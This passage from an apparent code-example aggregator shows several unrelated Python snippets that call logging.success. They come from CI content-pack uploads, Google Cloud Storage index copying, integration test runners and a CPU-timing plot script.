        logging.success(f"Uploaded packs:\n{successful_packs_table}")
        with open('pack_list.txt', 'w') as f:
            f.write(successful_packs_table.get_string())
    if skipped_packs:
        skipped_packs_table = _build_summary_table(skipped_packs,
                                                   include_pack_status=True)
        logging.warning(f"Number of skipped packs: {len(skipped_packs)}")
        logging.warning(f"Skipped packs:\n{skipped_packs_table}")
    if failed_packs:
        failed_packs_table = _build_summary_table(failed_packs,
                                                  include_pack_status=True)
        logging.critical(f"Number of failed packs: {len(failed_packs)}")
        logging.critical(f"Failed packs:\n{failed_packs_table}")
        if fail_build:
            # We don't want the bucket upload flow to fail in Prepare Content step if a pack has failed to upload.
            sys.exit(1)

    # for external pull requests - when there are no failed packs, add the build summary to the pull request
    branch_name = os.environ.get('CIRCLE_BRANCH')
    if branch_name and branch_name.startswith('pull/'):
        successful_packs_table = build_summary_table_md(successful_packs)

        build_num = os.environ['CIRCLE_BUILD_NUM']

        bucket_path = f'https://console.cloud.google.com/storage/browser/' \
                      f'marketplace-ci-build/content/builds/{branch_name}/{build_num}'

        pr_comment = f'Number of successfully uploaded packs: {len(successful_packs)}\n' \
                     f'Uploaded packs:\n{successful_packs_table}\n\n' \
                     f'Browse to the build bucket with this address:\n{bucket_path}'

        add_pr_comment(pr_comment)
Code example #28
def copy_index(index_folder_path: str, build_index_blob: Blob,
               build_index_generation: str, production_bucket: Bucket,
               build_bucket: Bucket):
    """ Copies the build bucket index to the production bucket index path.

    Args:
        index_folder_path (str): index folder full path.
        build_index_blob (Blob): google cloud storage object that represents build index.zip blob.
        build_index_generation (str): downloaded build index generation.
        production_bucket (google.cloud.storage.bucket.Bucket): gcs bucket where index is copied to.
        build_bucket (google.cloud.storage.bucket.Bucket): gcs bucket where index is copied from.

    """
    try:
        build_index_blob.reload()
        build_current_index_generation = build_index_blob.generation

        # disabling caching for prod index blob
        prod_index_storage_path = os.path.join(GCPConfig.STORAGE_BASE_PATH,
                                               f"{GCPConfig.INDEX_NAME}.zip")
        prod_index_blob = production_bucket.blob(prod_index_storage_path)
        prod_index_blob.cache_control = "no-cache,max-age=0"

        if build_current_index_generation == build_index_generation:
            copied_index = build_bucket.copy_blob(
                blob=build_index_blob,
                destination_bucket=production_bucket,
                new_name=prod_index_storage_path)
            if copied_index.exists():
                logging.success(
                    f"Finished uploading {GCPConfig.INDEX_NAME}.zip to storage."
                )
            else:
                logging.error(
                    "Failed copying index: build index blob does not exist."
                )
                sys.exit(1)
        else:
            logging.error(
                f"Failed in uploading {GCPConfig.INDEX_NAME}, mismatch in index file generation"
            )
            logging.error(
                f"Downloaded build index generation: {build_index_generation}")
            logging.error(
                f"Current build index generation: {build_current_index_generation}"
            )
            sys.exit(1)
    except Exception as e:
        logging.exception(
            f"Failed copying {GCPConfig.INDEX_NAME}. Additional Info: {str(e)}"
        )
        sys.exit(1)
    finally:
        shutil.rmtree(index_folder_path)
Code example #29
def run_test_logic(tests_settings: Any, c: Any, failed_playbooks: list,
                   integrations: list, playbook_id: str,
                   succeed_playbooks: list, test_message: str,
                   test_options: dict, slack: Any, circle_ci: str,
                   build_number: str, server_url: str, demisto_user: str,
                   demisto_pass: str, build_name: str) -> bool:
    """
    run_test_logic handles the testing of the integration by triggering check_integration. Afterwards,
    it will check the status of the test and report success or add the failed test to the list of
    failed integrations.

    :param tests_settings: SettingsTester object which contains the test variables
    :param c: Client for connecting to XSOAR via demisto-py
    :param failed_playbooks: List of failed playbooks, additional failed playbooks will be added if
                             they failed.
    :param integrations: List of integrations being tested.
    :param playbook_id: ID of the test playbook being tested.
    :param succeed_playbooks: List of playbooks which have passed tests.
    :param test_message: Name of the playbook/integration being tested. This is reported back in the
                         build and used to print to the console the test being run.
    :param test_options: Options being passed to the test. PID, Docker Threshold, Timeout, etc.
    :param slack: Slack client used for notifications.
    :param circle_ci: CircleCI token. Used to get name of dev who triggered the build.
    :param build_number: The build number of the CI run. Used in slack message.
    :param server_url: The FQDN of the server the tests are being run on.
    :param demisto_user: Username of the demisto user running the tests.
    :param demisto_pass: Password of the demisto user running the tests.
    :param build_name: Name of the build. (Nightly, etc.)
    :return: Boolean indicating if the test was successful.
    """
    status, inc_id = check_integration(c,
                                       server_url,
                                       demisto_user,
                                       demisto_pass,
                                       integrations,
                                       playbook_id,
                                       options=test_options)
    if status == PB_Status.COMPLETED:
        logging.success(f'PASS: {test_message} succeed')
        succeed_playbooks.append(playbook_id)

    elif status == PB_Status.NOT_SUPPORTED_VERSION:
        logging.info(f'PASS: {test_message} skipped - not supported version')
        succeed_playbooks.append(playbook_id)

    else:
        logging.error(f'Failed: {test_message} failed')
        playbook_id_with_mock = playbook_id
        playbook_id_with_mock += " (Mock Disabled)"
        failed_playbooks.append(playbook_id_with_mock)

    succeed = status in (PB_Status.COMPLETED, PB_Status.NOT_SUPPORTED_VERSION)

    return succeed
Code example #30
def main():
    install_logging('Update Tests step.log', include_process_name=True)
    existing_test_playbooks = load_test_data_from_conf_json()
    with ProcessPool(max_workers=os.cpu_count(), max_tasks=100) as pool:
        for pack_name in os.listdir(PACKS_DIR):
            future_object = pool.schedule(generate_pack_tests_configuration,
                                          args=(pack_name, existing_test_playbooks), timeout=20)
            future_object.add_done_callback(update_new_conf_json)

    add_to_conf_json(NEW_CONF_JSON_OBJECT)
    logging.success(f'Added {len(NEW_CONF_JSON_OBJECT)} tests to the conf.json')
    logging.success(f'Added the following objects to the conf.json:\n{pformat(NEW_CONF_JSON_OBJECT)}')
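
The ProcessPool with schedule(..., timeout=...) and per-future callbacks matches the pebble library's API; a self-contained sketch of that pattern under that assumption (the worker function is hypothetical):

from concurrent.futures import TimeoutError
from pebble import ProcessPool

def square(x):
    return x * x

def on_done(future):
    try:
        print(future.result())
    except TimeoutError:
        print("task timed out")  # raised when schedule()'s timeout cancels the task

with ProcessPool(max_workers=4, max_tasks=100) as pool:
    for i in range(5):
        pool.schedule(square, args=(i,), timeout=10).add_done_callback(on_done)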
Code example #31
    def executeTestScenario(self):
        timeoutthread.TimeoutThread(self._timeoutInterval, self._testTimedOut)
        logging.info(
            "Test timer armed. Timeout in %(seconds)d seconds", dict(seconds=self._timeoutInterval))
        self._setUp()
        try:
            self._run()
        finally:
            self._tearDown()
        logging.success(
            "Test completed successfully, in '%(filename)s', with %(asserts)d successful asserts",
            dict(filename=self._filename(), asserts=suite.successfulTSAssertCount()))
        print(".:1: Test passed")
Code example #32
    def _run(self):
        logging.progress("Running test in '%(filename)s'", dict(filename=self._filename()))
        try:
            self._test.run()
            suite.anamnesis['testSucceeded'] = True
            logging.success(
                "Test completed successfully, in '%(filename)s', with %(asserts)d successful asserts",
                dict(filename=self._filename(), asserts=suite.successfulTSAssertCount()))
            print(".:1: Test passed")
        except:
            suite.anamnesis['testFailed'] = True
            logging.exception("Test failed, in '%(filename)s'", dict(filename=self._filename()))
            suite.outputExceptionStackTrace()
            raise
Code example #33
    ax.set_ylabel(r'$J\; [\, \frac{1}{\rm{s}}\, ]$', fontsize=18)
    ax.set_xlim(0.5, MAX_CPU + 0.5)
    ax.set_xticks(flows.keys())
    plt.title("# Simulations %d" % len(flows[ncpu]))
    # ------------------ plot times
    ax2 = plt.subplot(212)
    ax2.plot(timedic.keys(), MT, "o-", lw=2, label='Mean', color='blue')
    ax2.errorbar(timedic.keys(), MT, yerr=ST, fmt='-o')
    ax2.set_xlabel(r'# cores', fontsize=18)
    ax2.set_ylabel(r'$T\; [ s ]$', fontsize=18)
    ax2.set_xticks(timedic.keys())
    ax2.set_xlim(0.5, MAX_CPU + 0.5)
    ax2.set_ylim(min(MT) - max(ST) - 0.1, max(MT) + max(ST) + 0.1)
    # ax.legend(loc='best')
    ax2.grid()
    plt.tight_layout()
    logging.info("save file in cpu.png")
    plt.savefig("cpu.png")
    # plt.show()
    #########################################################################

    tolerance = 0.5  # TODO: 0.5 is too large
    logging.info("time elapsed %.2f [s]." % (time2 - time1))
    logging.info("std_all = %.2f, tol=%.2f" % (std_all, tolerance))
    if std_all > tolerance:
        logging.success("%s exits with FAILURE std_all = %f > %f" % (argv[0], std_all, tolerance))
        exit(FAILURE)
    else:
        logging.info("%s exits with SUCCESS std_all = %f < %f" % (argv[0], std_all, tolerance))
        exit(SUCCESS)
Code example #34
File: main.py Project: Stratoscale/pyracktest
        popen = subprocess.Popen(
            ['python', _single, args.configurationFile, scenario, instance], close_fds=True)
        self._pids.append(popen.pid)
        result = popen.wait()
        self._pids.remove(popen.pid)
        took = time.time() - before
        self._results.append(dict(
            scenario=scenario, instance=instance, passed=result == 0, timeTook=took, host='localhost'))
        self._dumpLiveReport()


runner = Runner(args)
if args.listOnly:
    runner.printScenarios()
    sys.exit(0)
if args.parallel:
    runner.runParallel()
else:
    runner.runSequential()
runner.writeReport()
if runner.passedCount() < runner.total():
    logging.error(
        "%(failed)d tests Failed. %(passed)d/%(total)d Passed",
        dict(failed=runner.failedCount(), passed=runner.passedCount(), total=runner.total()))
    for scenario in runner.failed():
        logging.error("Failed scenario: %(scenario)s", dict(scenario=scenario))
    sys.exit(1)
else:
    logging.success(
        "Tests Passed: %(passed)d/%(total)d", dict(passed=runner.passedCount(), total=runner.total()))